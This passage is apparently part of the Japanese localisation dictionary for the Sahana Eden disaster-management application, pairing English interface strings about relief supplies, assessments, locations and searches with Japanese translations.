"A location that specifies the geographic area for this region. This can be a location from the location hierarchy, or a 'group location', or a location that has a boundary for the area.": 'この地域を地理的に指定するロケーション。これはロケーションの階層構造のうちの一つか、ロケーショングループの一つか、この地域の境界に面するロケーションです。',
"Acronym of the organization's name, eg. IFRC.": '団体の略称 (IFRCなど)',
"Authenticate system's Twitter account": '認証システムの Twitter アカウント',
"Can't import tweepy": 'tweepyをインポートできません',
"Click on 'Pledge' button in the left-hand column to make a Pledge to match a request for aid.": "救援要請と寄付項目を関連付けるには、項目左の'寄付'ボタンを押してください。",
"Couldn't import tweepy library": 'tweepy libraryをインポートできません',
"Detailed address of the site for informational/logistics purpose. Please note that you can add GIS/Mapping data about this site in the 'Location' field mentioned below.": 'サイトの所在地住所を詳細に記述します。情報伝達と物品搬送に使用します。このサイトに関する情報を、以下の「ロケーション」項目にGIS/地図データを挿入できることに注意してください。',
"If this configuration represents a region for the Regions menu, give it a name to use in the menu. The name for a personal map configuration will be set to the user's name.": 'もしこの設定が地域メニューにある地域を指しているのであれば、メニューで使う名前を設定してください。個人用の地図設定の名前では、ユーザの名前で設定されます。',
"If this field is populated then a user who specifies this Organization when signing up will be assigned as a Staff of this Organization unless their domain doesn't match the domain field.": 'この項目が設定されている場合、ユーザーは、登録の際、この団体のスタッフとしてアサインされるように指定することができます。ただし、ユーザーのドメインと団体のドメイン項目に差異がない場合のみ有効です。',
"If this is ticked, then this will become the user's Base Location & hence where the user is shown on the Map": 'この項目の内容はユーザーの基本所在地となり、ユーザーが地図上に表示されるようになります。',
"If this setting is enabled then all deleted records are just flagged as deleted instead of being really deleted. They will appear in the raw database access but won't be visible to normal users.": 'この設定が有効の場合、削除されたレコードには削除済みフラグが付与されるだけで、実際のデータは消去されません。一般のユーザが閲覧することはできませんが、データベースを直接参照することでデータを確認できます。',
"If you cannot find the record of the person you want to report missing, you can add it by clicking 'Add Person' below:": '行方不明者の登録が存在しない場合、「人物情報を追加」ボタンを押して、新規登録を行ってください。',
"If you don't see the Hospital in the list, you can add a new one by clicking link 'Create Hospital'.": 'リストに病院が表示されない場合、「病院情報を追加」することで新規に登録が可能です。',
"If you don't see the Office in the list, you can add a new one by clicking link 'Create Office'.": 'オフィスが一覧にない場合は、「オフィスを追加」をクリックすることで新規のオフィスを追加できます。',
"If you don't see the Organization in the list, you can add a new one by clicking link 'Create Organization'.": "もしあなたの団体の登録がない場合、'団体を追加'リンクをクリックすることで追加が可能です",
"Instead of automatically syncing from other peers over the network, you can also sync from files, which is necessary where there's no network. You can use this page to import sync data from files and also export data to sync files. Click the link on the right to go to this page.": 'データを同期する際には、ネットワークを経由してではなく、ファイルから行うことも可能です。ネットワークが存在しない場合に利用されます。ファイルからのデータインポート、およびファイルへのエクスポートはこのページから実行可能です。右部のリンクをクリックしてください。',
"Level is higher than parent's": '親情報よりも高いレベルです',
"NB SMS requests are filtered to just those which are 'actionable', whilst the Tweet requests are unfiltered, so that is likely to be a good place to start Searching.": "注意: SMS は'アクション可能'のためリクエストがフィルターされます。一方、ツイートのリクエストはフィルターされません。よって、これは検索する手段となります",
"Need a 'url' argument!": "'url'引数が必要です。",
"Optional. The name of the geometry column. In PostGIS this defaults to 'the_geom'.": "オプション項目。ジオメトリカラムの名称です。PostGISでのデフォルト値は 'the_geom'となります。",
"Parent level should be higher than this record's level. Parent level is": '親レベルは、このレコードのレベルより上位でなければなりません。親レベルは',
"Password fields don't match": 'パスワードが一致しません。',
"Phone number to donate to this organization's relief efforts.": 'この団体の救援活動に対して寄付を行う際の連絡先となる電話番号を記載します。',
"Please come back after sometime if that doesn't help.": 'この方法で問題が解決しない場合は、しばらく時間を置いて再度アクセスしてください。',
"Press the 'Delete Old' button to have all records which reference this one be repointed at the new one & then the old record will be deleted.": "'Delete Old'ボタンを押すことで、データを参照しているレコードは全て参照先を再指定され、古い方のレコードは削除されます。",
"Quantity in %s's Inventory": '%s 倉庫にある量',
"Search here for a person's record in order to:": '人物情報の検索を行い、以下の機能を実現します:',
"Select a person in charge for status 'assigned'": "状況が '割り当て済み' である担当者を選択します",
"Select this if all specific locations need a parent at the deepest level of the location hierarchy. For example, if 'district' is the smallest division in the hierarchy, then all specific locations would be required to have a district as a parent.": 'もし全ての特定の場所が住所階層の最下層で親の場所を必要とするなら、これを選択して下さい。例えば、もし「地区」が階層の最小の地域なら、全ての特定の場所は親階層の地区を持っている必要が有るでしょう。',
"Select this if all specific locations need a parent location in the location hierarchy. This can assist in setting up a 'region' representing an affected area.": 'もし全ての特定の場所が住所階層での親の場所を必要とするなら、これを選択して下さい。これは被災地の「地域」表示の設定に役立てられます。',
"Sorry, things didn't get done on time.": 'すいません、時間通りに行われていません。',
"Sorry, we couldn't find that page.": 'すいません、お探しのページは見つかりませんでした。',
"System's Twitter account updated": 'システムのTwitterアカウントを変更しました',
"The <a href='http://en.wikipedia.org/wiki/Well-known_text' target=_blank>Well-Known Text</a> representation of the Polygon/Line.": "この線、あるいは面の<a href='http://en.wikipedia.org/wiki/Well-known_text' target=_blank>具体的な説明</a>",
"The Donor(s) for this project. Multiple values can be selected by holding down the 'Control' key.": 'このプロジェクトの資金提供組織を選択します。複数の項目を選択するには、Ctrlキーを押しながらクリックしてください。',
"The Sector(s) this organization works in. Multiple values can be selected by holding down the 'Control' key.": 'この団体の活動分野を選択します。複数の項目を選択するには、コントロールキーを押しながらクリックしてください。',
"The URL of the image file. If you don't upload an image file, then you must specify its location here.": '画像ファイルのURLです。ファイルのアップロードを行わない場合、ロケーションをURL項目に入力してください。',
"The person's manager within this Office/Project.": 'このオフィス/プロジェクトのマネージャ。',
"To search for a body, enter the ID label of the body. You may use % as wildcard. Press 'Search' without input to list all bodies.": '遺体の検索を行うには、遺体のID番号を入力してください。検索時のワイルドカード文字として、%を使うことができます。入力せずに「検索」すると、全ての遺体が表示されます。',
"To search for a body, enter the ID tag number of the body. You may use % as wildcard. Press 'Search' without input to list all bodies.": 'ID情報を入力することで、遺体を検索します。ワイルドカードとして % が使用できます。何も指定せずに「検索」すると、全ての遺体が表示されます。',
"To search for a hospital, enter any of the names or IDs of the hospital, or the organization name or acronym, separated by spaces. You may use % as wildcard. Press 'Search' without input to list all hospitals.": "病院を検索するには、名前、病院のID、団体名、省略名のいずれかをスペース(空白)で区切って入力してください。 % がワイルドカードとして使えます。全病院のリストを表示するにはなにも入力せずに '検索' ボタンを押してください。",
"To search for a hospital, enter any of the names or IDs of the hospital, separated by spaces. You may use % as wildcard. Press 'Search' without input to list all hospitals.": '探し出したい病院をテキスト入力し、検索を行うことができます。検索時のワイルドカード文字として、%を使うことができます。何も入力せずに「検索」ボタンを押した場合、全ての病院を表示します。',
"To search for a hospital, enter any part of the name or ID. You may use % as wildcard. Press 'Search' without input to list all hospitals.": '病院を検索するには、名称の一部かIDを入力してください。検索時のワイルドカード文字として、%を使うことができます。何も入力せずに「検索」を押した場合、全ての病院を表示します。',
"To search for a location, enter the name. You may use % as wildcard. Press 'Search' without input to list all locations.": "ロケーションを検索するには、名前を入力します。%をワイルドカード文字として使用することが出来ます。何も入力しないで '検索' をクリックするとすべてのロケーションが表示されます。",
"To search for a person, enter any of the first, middle or last names and/or an ID number of a person, separated by spaces. You may use % as wildcard. Press 'Search' without input to list all persons.": '苗字、名前などを半角スペースで区切って入力し、人物検索して下さい。「%」を使うとファジー検索できます。何も入力せずに検索すれば、全ての情報を検索表示します。',
"To search for a person, enter any of the first, middle or last names, separated by spaces. You may use % as wildcard. Press 'Search' without input to list all persons.": '人を検索するためには、お名前(苗字、名前または両方)を入力してください。また姓名の間にはスペースをいれてください。ワイルドカードとして % が使えます。すべての人物情報をリストするには、検索ボタンをおしてください。',
"To search for a request, enter some of the text that you are looking for. You may use % as wildcard. Press 'Search' without input to list all requests.": '探し出したい支援要請をテキスト入力し、検索を行うことができます。検索時のワイルドカード文字として、%を使うことができます。何も入力せずに「検索」ボタンを押した場合、全ての支援要請を表示します。',
"To search for an assessment, enter any portion the ticket number of the assessment. You may use % as wildcard. Press 'Search' without input to list all assessments.": 'アセスメントを検索するには、アセスメントのチケット番号の一部を入力してください。ワイルドカードとして % が使えます。すべてのアセスメントをリストするには、なにも入力せず検索ボタンをおしてください。',
"Type the first few characters of one of the Person's names.": '検索したい人物の名前の先頭数文字を入力してください',
"Upload an image file here. If you don't upload an image file, then you must specify its location in the URL field.": '画像ファイルのアップロードはここから行ってください。ファイルのアップロードを行わない場合、ロケーションをURL項目に入力してください。',
"View and/or update details of the person's record": '人物情報を検索し、詳細の閲覧や更新を行ないます',
"View/Edit the Database directly (caution: doesn't respect the framework rules!)": 'データベースの直接閲覧/編集(注意:フレームワークの規則に反します)',
"What are the people's normal ways to obtain food in this area?": 'この地域で食料を調達するための手段を記載してください',
"What should be done to reduce women and children's vulnerability to violence?": '未成年や女性を暴力から守るために、どのような活動や設備が必要かを記載してください',
"When syncing data with others, conflicts happen in cases when two (or more) parties want to sync information which both of them have modified, i.e. conflicting information. Sync module tries to resolve such conflicts automatically but in some cases it can't. In those cases, it is up to you to resolve those conflicts manually, click on the link on the right to go to this page.": '他とデータを同期するとき、二つ(以上)の団体がそれぞれ更新した情報を同期するときにコンフリクトが発生することがあります。同期モジュールは、コンフリクトを自動解決しようと試みますが、解決できないことがあります。そのような場合、手作業でコンフリクトを解決するか、クリックして次のページに進んでください。',
"You have personalised settings, so changes made here won't be visible to you. To change your personalised settings, click ": 'ユーザ固有の設定を行っている場合、ここで変更を行っても、目に見える変化がない場合があります。ユーザ固有の設定を行うには、以下をクリックしてください。 ',
"You have unsaved changes. Click Cancel now, then 'Save' to save them. Click OK now to discard them.": '変更が保存されていません。「キャンセル」をクリックした後、「保存」を押して保存してください。変更を破棄するには、OK をクリックしてください。',
"You haven't made any calculations": '計算が実行されていません',
"You haven't yet Verified your account - please check your email": '利用者登録はまだ有効ではありません。',
"couldn't be parsed so NetworkLinks not followed.": 'パースできなかったため、 NetworkLinksはフォローされません。',
"includes a GroundOverlay or ScreenOverlay which aren't supported in OpenLayers yet, so it may not work properly.": 'OpenLayersで未サポートの機能である GroundOverlayやScreenOverlayを含むため、不具合がある可能性があります。',
'"update" is an optional expression like "field1=\'newvalue\'". You cannot update or delete the results of a JOIN': '"更新" は、"field1=\'newvalue\'" のようなオプションです。"JOIN の結果を更新または削除することはできません。',
'# Houses Damaged': '損傷した家屋の数',
'# Houses Flooded': '浸水した家屋数',
'# People Needing Food': '食料が必要な人の数',
'# People at Risk From Vector-Borne Diseases': '生物が媒介する疾病の危険性がある人の数',
'# People without Access to Safe Drinking-Water': '安全な飲料水が確保されていない人の数',
'# of Houses Damaged': '損壊した家屋数',
'# of Houses Destroyed': '全壊した家屋数',
'# of International Staff': '国外スタッフ人数',
'# of National Staff': '国内スタッフの人数',
'# of People Affected': '被災者数',
'# of People Deceased': '死亡者数',
'# of People Injured': '負傷者数',
'# of Vehicles': '車両数',
'%s Create a new site or ensure that you have permissions for an existing site.': '%s 新しいサイトを作成するか既存のサイトに対する権限を持っているかどうか確認して下さい',
'%s rows deleted': '%s 行を削除しました',
'%s rows updated': '%s 行を更新しました',
'& then click on the map below to adjust the Lat/Lon fields': 'そして下の地図をクリックして、緯度 / 経度フィールドを調節してください',
'* Required Fields': '* は必須項目です',
'0-15 minutes': '0-15 分間',
'1 Assessment': '1アセスメント',
'1 location, shorter time, can contain multiple Tasks': '1つの地域における短期間の活動を表し、1つの支援活動のなかで複数のタスクを実行します。',
'1-3 days': '1-3 日間',
'1. Fill the necessary fields in BLOCK letters.': '1. 太字の項目は必須項目です.',
'15-30 minutes': '15-30 分間',
'2 different options are provided here currently:': '現在は、2種類のオプションが提供されています。',
'2. Always use one box per letter and leave one box space to seperate words.': '2. 一マス一文字で、単語の間は一マス開けてください。',
'2x4 Car': '2x4 車両',
'30-60 minutes': '30-60 分間',
'4-7 days': '4-7 日間',
'4x4 Car': '四輪駆動車',
'8-14 days': '8-14 日間',
'A Marker assigned to an individual Location is set if there is a need to override the Marker assigned to the Feature Class.': '機能クラスに設定したマーカーを上書きする必要があれば、個々のロケーションに設定したマーカーを設定します',
'A Reference Document such as a file, URL or contact person to verify this data. You can type the 1st few characters of the document name to link to an existing document.': 'このデータ内容を確認できるファイルやURL情報、連絡先担当者などのリファレンスデータを記載します。最初の何文字かを入力することで、既存の類似文書にリンクすることが可能です。',
'A Warehouse is a physical place which contains Relief Items available to be Distributed.': '倉庫とは、救援物資の配布を行うことができる物理的な地点を意味します。',
'A Warehouse/Site is a physical location with an address and GIS data where Items are Stored. It can be a Building, a particular area in a city or anything similar.': '倉庫 / サイトとは、物資の保管場所のことであり、住所とGIS情報が付帯します。特定の建物や、市内の特定地域などがあげられます。',
'A brief description of the group (optional)': 'グループの詳細(オプション)',
'A file downloaded from a GPS containing a series of geographic points in XML format.': 'GPSからダウンロードしたファイルには、その地点に関する様々な情報がXML形式で保存されています。',
'A file in GPX format taken from a GPS whose timestamps can be correlated with the timestamps on the photos to locate them on the map.': 'GPSから取得したGPX形式のファイル。タイムスタンプは画像と関連づけられ、地図上に配置することができます。',
'A library of digital resources, such as photos, documents and reports': '写真や文書、レポートなど、電子化された資料',
'A location group is a set of locations (often, a set of administrative regions representing a combined area). Member locations are added to a location group here. Location groups may be used to filter what is shown on the map and in search results to only entities covered by locations in the group. A location group can be used to define the extent of an affected area, if it does not fall within one administrative region. Location groups can be used in the Regions menu.': 'ロケーションを取りまとめた単位はロケーショングループと呼称されます(たいていは、一定範囲内の管理対象地域をさします)。このページから、ロケーションをグループに追加することができます。ロケーショングループ単位で地図上に表示させたり、検索結果として表示させることが可能となります。グループを使用することで、1つの管理地域に縛られない被災地域定義が可能となります。ロケーショングループは、地域メニューから定義できます。',
'A location group must have at least one member.': 'ロケーショングループには、メンバーが最低一人必要です。',
'A place within a Site like a Shelf, room, bin number etc.': 'Site内に存在する施設。例えば棚、部屋、Binの番号など',
'A snapshot of the bin or additional documents that contain supplementary information about it can be uploaded here.': 'binのスナップショットや追加情報の更新は、ここから行えます。',
'A snapshot of the location or additional documents that contain supplementary information about the Site Location can be uploaded here.': 'ロケーションのスナップショットや、Siteに関する追加情報の更新は、ここから行えます。',
'A snapshot of the location or additional documents that contain supplementary information about the Site can be uploaded here.': 'ロケーションのスナップショットや、Siteに関する追加情報の更新は、ここから行えます。',
'A survey series with id %s does not exist. Please go back and create one.': 'ID番号 %sに関するsurvey seriesは存在しません。「戻る」ボタンを押して、新規に作成してください。',
'ABOUT THIS MODULE': 'このモジュールについて',
'ABOUT': '概要',
'ACCESS DATA': 'アクセスデータ',
'ANY': '全て',
'API is documented here': 'APIに関する文書はこちら',
'ATC-20 Rapid Evaluation modified for New Zealand': 'ニュージーランド向けに変更したATC-20(建物の簡易安全性評価プロセス)',
'ATC-20': 'ATC-20(建物の簡易安全性評価プロセス)',
'Abbreviation': '省略',
'Ability to Fill Out Surveys': '調査記入能力',
'Ability to customize the list of details tracked at a Shelter': '避難所で追跡する詳細のリストのカスタマイズ可否',
'Ability to customize the list of human resource tracked at a Shelter': '避難所で追跡する詳細のリストのカスタマイズの可否',
'Ability to customize the list of important facilities needed at a Shelter': '避難所で追跡する人的資源のリストのカスタマイズの可否',
'Ability to track partial fulfillment of the request': '支援要請の部分的な達成度の追跡可否',
'Ability to view Results of Completed and/or partially filled out Surveys': '完了または一部完了した聞き取り調査の結果をみる機能',
'About Sahana Eden': 'Sahana Edenについて',
'About Sahana': 'Sahanaについて',
'About this module': 'モジュールの詳細',
'About': '情報',
'Access denied': 'アクセスが拒否されました',
'Access to Shelter': '避難所へのアクセス',
'Access to education services': '学校へのアクセス',
'Accessibility of Affected Location': '被災地域へのアクセス方法',
'Account registered, however registration is still pending approval - please wait until confirmation received.': '利用者登録の申請を受け付けました。所属団体またはサイト管理者による承認を待っています。',
'Acronym': '略称/イニシャル',
'Actionable by all targeted recipients': 'すべての対象受信者にとって実用的な',
'Actionable only by designated exercise participants; exercise identifier SHOULD appear in <note>': '指定された参加者のみ実施可能です。<note>の中に行使するためのIDがあることが必要です。',
'Actionable': '対応可能',
'Actioned?': '実施済み?',
'Actions taken as a result of this request.': '要請に対して行われるアクション',
'Actions': 'アクション',
'Active Problems': '対処中の問題',
'Activities Map': '支援活動マップ',
'Activities are blue.': '支援活動(アクティビティ)は青色で表示されます。',
'Activities matching Assessments:': 'アセスメントに適合した支援活動',
'Activities of boys 13-17yrs before disaster': '災害発生前の13-17歳男子の活動状況',
'Activities of boys 13-17yrs now': '現在の13-17歳男子の活動状況',
'Activities of boys <12yrs before disaster': '災害発生前の12歳以下男子の活動状況',
'Activities of boys <12yrs now': '現在の12歳以下男子の活動状況',
'Activities of children': '子供たちの活動',
'Activities of girls 13-17yrs before disaster': '災害発生前の13-17歳女子の活動状況',
'Activities of girls 13-17yrs now': '現在の13-17歳女子の活動状況',
'Activities of girls <12yrs before disaster': '災害発生前の12歳以下女子の活動状況',
'Activities of girls <12yrs now': '現在の12歳以下女子の活動状況',
'Activities': '支援活動',
'Activity Added': '支援活動を追加しました',
'Activity Deleted': '支援活動を削除しました',
'Activity Details': '支援活動の詳細',
'Activity Report': '支援活動レポート',
'Activity Reports': '支援活動レポート',
'Activity Type': '支援活動タイプ',
'Activity Updated': '支援活動を更新しました',
'Activity': '支援活動',
'Add Address': 'アドレスを追加',
'Add Activity Type': '支援活動タイプを追加',
'Add Aid Request': '治療要請を追加',
'Add Alternative Item': '代わりの物資を追加',
'Add Assessment Summary': 'アセスメントの要約を追加',
'Add Assessment': 'アセスメントを追加',
'Add Baseline Type': '基準値タイプの追加',
'Add Baseline': '基準値の追加',
'Add Bin Type': 'Bin Typeを追加',
'Add Bins': 'Binを追加',
'Add Bundle': 'Bundleを追加',
'Add Catalog.': 'カタログを追加',
'Add Category': 'カテゴリを追加',
'Add Category<>Sub-Category<>Catalog Relation': 'Category<>Sub-Category<>Catalog 関係を追加',
'Add Config': '設定を追加',
'Add Contact': '連絡先を追加',
'Add Contact Information': '連絡先情報を追加',
'Add Credential': '証明書の追加',
'Add Credentials': '証明書の追加',
'Add Detailed Evaluation': '詳細な評価を追加',
'Add Disaster Victims': '被災者情報を追加',
'Add Distribution.': '配給所を追加',
'Add Donor': '資金提供組織を追加',
'Add Flood Report': '洪水レポートを追加',
'Add Group Member': 'グループメンバを追加',
'Add Identity': 'IDを追加',
'Add Image': '画像を追加',
'Add Impact Type': '災害影響のタイプを追加',
'Add Impact': '被災状況の追加',
'Add Inventory Item': '備蓄物資を追加します',
'Add Inventory Store': '物資集積地点を追加',
'Add Item (s)': '物資を追加',
'Add Item Catalog': '物資カタログを追加',
'Add Item Category': '救援物資カタログカテゴリを追加',
'Add Item Sub-Category': '救援物資サブカテゴリを追加',
'Add Item to Request': '要求する支援物資の登録',
'Add Item to Shipment': '輸送に物資を追加する',
'Add Item': '物資を追加',
'Add Key': 'Keyを追加',
'Add Kit': 'Kitを追加',
'Add Level 1 Assessment': 'レベル1アセスメントを追加',
'Add Level 2 Assessment': 'レベル2アセスメントを追加',
'Add Line': '行を追加',
'Add Location Group': 'ロケーショングループを追加',
'Add Locations': 'ロケーションを追加',
'Add Log Entry': 'ログエントリを追加',
'Add Member': 'メンバを追加',
'Add Membership': 'メンバシップを追加',
'Add Message': 'メッセージを追加',
'Add Need Type': '需要タイプを追加',
'Add Need': '要求を追加',
'Add New Aid Request': '援助要請を新規追加',
'Add New Assessment Summary': '新規アセスメントの要約を追加',
'Add New Baseline Type': '基準値タイプの新規追加',
'Add New Baseline': '新しい基準値を追加',
'Add New Bin Type': 'Bin Typeを新規追加',
'Add New Bin': 'Binを新規追加',
'Add New Budget': '予算を新規追加',
'Add New Bundle': 'Bundleを新規追加',
'Add New Cluster Subsector': 'クラスタのサブセクタを新規作成',
'Add New Cluster': 'クラスタを新規追加',
'Add New Commitment Item': '物資コミットメントを新規追加',
'Add New Config': '設定を新規追加',
'Add New Distribution Item': '配給物資を新規追加',
'Add New Distribution': '配給所を新規追加',
'Add New Document': '文書を新規追加',
'Add New Donor': '資金提供組織を新規追加',
'Add New Entry': 'エントリを新規追加',
'Add New Flood Report': '洪水情報を新規追加',
'Add New Image': '画像を新規追加',
'Add New Impact Type': '災害影響のタイプを新規追加',
'Add New Impact': '新規影響を追加',
'Add New Inventory Item': '備蓄物資を新規追加',
'Add New Inventory Store': '物資集積場所を新規追加',
'Add New Item Catalog Category': '物資カタログカテゴリを新規追加',
'Add New Item Catalog': '物資カタログを新規追加',
'Add New Item Sub-Category': '物資サブカテゴリを新規追加',
'Add New Item to Kit': 'キットに救援物資を新規追加',
'Add New Key': 'Keyを新規追加',
'Add New Level 1 Assessment': 'レベル1アセスメントを新規追加',
'Add New Level 2 Assessment': 'レベル2アセスメントを新規追加',
'Add New Member': 'メンバを新規追加',
'Add New Membership': 'メンバシップを新規追加',
'Add New Metadata': 'メタデータを新規追加',
'Add New Need Type': '需要タイプを新規追加',
'Add New Need': '新しい要求を登録する',
'Add New Note': '追加情報を新規追加',
'Add New Peer': 'データ同期先を新規追加',
'Add New Position': '場所を新規追加',
'Add New Problem': '問題を新規追加',
'Add New Rapid Assessment': '被災地の現況アセスメントを新規追加',
'Add New Received Item': '受領した物資を新規追加',
'Add New Record': 'レコードを新規追加',
'Add New Request Item': '特定物資の要請を新規追加',
'Add New Request': '支援要請を新規追加',
'Add New Response': '支援要請を新規追加',
'Add New River': '河川情報を新規追加',
'Add New Role to User': 'ユーザに役割を新規割り当て',
'Add New Sent Item': '送った物資の追加',
'Add New Setting': '設定を新規追加',
'Add New Shipment to Send': '発送する輸送物資を新規追加',
'Add New Site': 'Siteを新規追加',
'Add New Solution': '解決案を提示する',
'Add New Staff Type': 'スタッフタイプを新規追加',
'Add New Staff': 'スタッフを新規追加',
'Add New Storage Location': '備蓄場所を新規追加',
'Add New Survey Answer': '新しい調査の回答を追加しました',
'Add New Survey Question': '調査項目を新規追加',
'Add New Survey Section': '新しい調査セクションを追加',
'Add New Survey Series': '新しい一連の調査を追加します',
'Add New Survey Template': 'Survey Templateを新規追加',
'Add New Team': 'チームを新規追加',
'Add New Ticket': 'チケットを新規追加',
'Add New Track': '追跡情報を新規追加',
'Add New Unit': '単位を新規追加',
'Add New User to Role': '新規ユーザに役割を割り当て',
'Add New Warehouse Item': '倉庫物資を新規追加',
'Add New': '新規追加',
'Add Note': 'ノートを追加',
'Add Peer': 'データ同期先を追加',
'Add Performance Evaluation': 'パフォーマンス評価を追加',
'Add Person': '人物情報を追加',
'Add Photo': '写真を追加',
'Add Point': 'ポイントを追加',
'Add Polygon': 'Polygonを追加',
'Add Position': '場所を追加',
'Add Problem': '問題を追加',
'Add Projections': '地図投影法を追加',
'Add Question': '質問事項を追加',
'Add Rapid Assessment': '被災地の現況アセスメントを追加',
'Add Rapid Evaluation': '迅速評価を追加',
'Add Recipient Site': '受け取りSiteを追加',
'Add Recipient': '受け取り担当者を追加',
'Add Record': 'レコードを追加',
'Add Recovery Report': '遺体回収レポートを追加',
'Add Reference Document': 'リファレンス文書を追加',
'Add Report': 'レポートを追加',
'Add Request Detail': '支援要請の詳細を追加',
'Add Request Item': '物資の要請を追加します',
'Add Request': '支援要請を追加',
'Add Response': '返答を追加',
'Add Section': 'Sectionを追加',
'Add Sender Organization': '送付元団体を追加',
'Add Sender Site': '送付元Siteを追加',
'Add Setting': '設定を追加',
'Add Shipment Transit Log': '輸送履歴を追加',
'Add Shipment/Way Bills': '輸送費/渡航費を追加',
'Add Site': 'サイトを追加',
'Add Skill Types': 'スキルタイプを追加',
'Add Solution': '解決案を追加',
'Add Staff Type': 'スタッフタイプを追加',
'Add Staff': 'スタッフを追加',
'Add Storage Bin ': 'Storage Binを追加 ',
'Add Storage Bin Type': 'Storage Bin Typeを追加',
'Add Storage Location': '備蓄地点を追加',
'Add Sub-Category': 'サブカテゴリを追加',
'Add Subscription': '寄付金情報を追加',
'Add Survey Answer': '調査の回答を追加',
'Add Survey Question': '聞き取り調査項目を追加',
'Add Survey Section': '調査セクションの追加',
'Add Survey Series': '一連の調査を追加',
'Add Survey Template': '調査テンプレートを追加',
'Add Team Member': 'メンバを追加',
'Add Team': 'チームを追加',
'Add Ticket': 'チケットを追加',
'Add Unit': '単位を追加',
'Add Volunteer Registration': 'ボランティア登録を追加',
'Add Warehouse Item': '倉庫物資を追加',
'Add a Reference Document such as a file, URL or contact person to verify this data. If you do not enter a Reference Document, your email will be displayed instead.': 'ファイル、URL、あるいは、このデータの確認を行なう連絡先のような参照文書を追加します。参照文書を入力しない場合、代わりにあなたのメールが表示されます。',
'Add a Volunteer': 'ボランティアの追加',
'Add a new Relief Item.': '救援物資を新規追加',
'Add a new Site from where the Item is being sent.': 'この救援物資の送付先を新規サイトとして追加',
'Add a new Site where the Item is being sent to.': 'この物資の送付先サイトを新規追加',
'Add an Photo.': '写真を追加.',
'Add location': 'ロケーションを追加',
'Add main Item Category.': '主要なアイテムカテゴリを追加',
'Add main Item Sub-Category.': '主要な救援物資サブカテゴリを追加',
'Add new Group': 'グループを新規追加',
'Add new Individual': '個人を新規追加',
'Add new position.': '新しいポジションを追加してください。',
'Add new project.': 'プロジェクトを新規追加',
'Add new staff role.': 'スタッフの権限を新規追加',
'Add or Update': '追加、あるいは更新',
'Add the Storage Bin Type.': 'Storage Binタイプを追加します。',
'Add the Storage Location where this bin is located.': 'binが保存されている貯蔵場所を追加します。',
'Add the Storage Location where this this Bin belongs to.': 'このBinがある備蓄地点を追加します。',
'Add the main Warehouse/Site information where this Bin belongs to.': 'その物資の備蓄スペースとなっている倉庫/サイトの情報を追加してください。',
'Add the main Warehouse/Site information where this Item is to be added.': 'この物資が追加されることになっている主要な倉庫 / サイトの情報を追加してください。',
'Add the main Warehouse/Site information where this Storage location is.': 'その物資の備蓄場所となっている倉庫/サイトの情報を追加してください。',
'Add the unit of measure if it doesnt exists already.': '距離単位が未登録の場合、単位を追加します。',
'Add to Bundle': 'Bundleへの登録',
'Add to Catalog': 'カタログへ登録',
'Add to budget': '予算項目へ登録',
'Add': '追加',
'Add/Edit/Remove Layers': 'レイヤを追加/編集/削除',
'Added to Group': 'メンバシップを追加しました',
'Added to Team': 'メンバシップを追加しました',
'Additional Beds / 24hrs': '追加ベッド予測数 / 24h',
'Additional Comments': '追加コメント',
'Additional quantity quantifier – i.e. “4x5”.': '数量を表す追記(例 「4x5」)',
'Address Details': '住所情報の詳細',
'Address Type': '住所情報タイプ',
'Address added': '住所情報を追加しました',
'Address deleted': '住所情報を削除しました',
'Address updated': '住所情報を更新しました',
'Address': '住所情報',
'Addresses': '住所',
'Adequate food and water available': '適切な量の食料と水が供給されている',
'Adequate': '適正',
'Adjust Item(s) Quantity': 'アイテム量の修正',
'Adjust Items due to Theft/Loss': 'アイテム量の修正(盗難/紛失のため)',
'Admin Email': '管理者の電子メール',
'Admin Name': '管理者名',
'Admin Tel': '管理者の電話番号',
'Admin': '管理者',
'Administration': '管理',
'Administrator': '管理者',
'Admissions/24hrs': '患者増加数/24h',
'Adolescent (12-20)': '青年(12-20)',
'Adolescent participating in coping activities': '未成年が災害対応に従事',
'Adult (21-50)': '成人(21-50)',
'Adult ICU': '成人 ICU',
'Adult Psychiatric': '精神病の成人',
'Adult female': '成人女性',
'Adult male': '成人男性',
'Adults in prisons': '刑務所で服役中の成人がいる',
'Advanced Bin Search': 'Binの詳細検索',
'Advanced Catalog Search': 'カタログの詳細検索',
'Advanced Category Search': '詳細カテゴリー検索',
'Advanced Item Search': '詳細な物資検索',
'Advanced Location Search': '詳細な位置検索',
'Advanced Site Search': 'Siteの詳細検索',
'Advanced Sub-Category Search': 'サブカテゴリの詳細検索',
'Advanced Unit Search': '高度な単位検索',
'Advanced': '詳細',
'Advanced:': 'もっと正確に:',
'Advisory': '注意喚起',
'After clicking on the button, a set of paired items will be shown one by one. Please select the one solution from each pair that you prefer over the other.': 'このボタンをクリックすると、解決法のペアが順に表示されます。各ペアから、最も適する項目を1つずつ選択してください。',
'Age Group': '年齢グループ',
'Age group does not match actual age.': '年齢グループが実際の年齢と一致しません。',
'Age group': '年齢グループ',
'Aggravating factors': '悪化要因',
'Aggregate Items': 'アイテムの集約',
'Agriculture': '農業',
'Aid Request Details': '援助要請の詳細',
'Aid Request added': '援助要請を追加しました',
'Aid Request deleted': '救援要請を追加しました',
'Aid Request updated': '援助要請を更新しました',
'Aid Request': '治療要請',
'Aid Requests': '援助要請',
'Air Transport Service': '物資空輸サービス',
'Aircraft Crash': '飛行機事故',
'Aircraft Hijacking': '航空機ハイジャック',
'Airport Closure': '空港閉鎖',
'Airspace Closure': '離陸地点閉鎖',
'Alcohol': 'アルコール',
'Alert': 'アラート',
'All Inbound & Outbound Messages are stored here': '送受信した全てのメッセージはここに格納されます。',
'All Locations': '全てのロケーション',
'All Records': 'すべてのレコード',
'All Requested Items': '物資要請一覧',
'All Resources': 'すべての資源',
'All data provided by the Sahana Software Foundation from this site is licenced under a Creative Commons Attribution licence. However, not all data originates here. Please consult the source field of each entry.': 'このサイトのSahana Software Foundationで提供されるデータのライセンスは、CCA (Creative Commons Attribution licence)となります。しかし、すべてのデータの発生源が、このサイトであるとは限りません。詳細は、各エントリの情報ソースの項目に記載されています。',
'All': '全て',
'Allowed to push': 'プッシュが許可済みである',
'Allows a Budget to be drawn up': '予算の策定を行ないます',
'Allows authorized users to control which layers are available to the situation map.': '認証済みユーザーが「状況地図のどのレイヤが利用できるか」を制御することを許可します。',
'Alternative Item Details': '代わりの品物についての詳細',
'Alternative Item added': '代わりの物資を追加しました',
'Alternative Item deleted': '代わりの品物が削除されました',
'Alternative Item updated': '代わりの物資を更新しました',
'Alternative Item': '代わりの物資',
'Alternative Items': '代わりとなる物資',
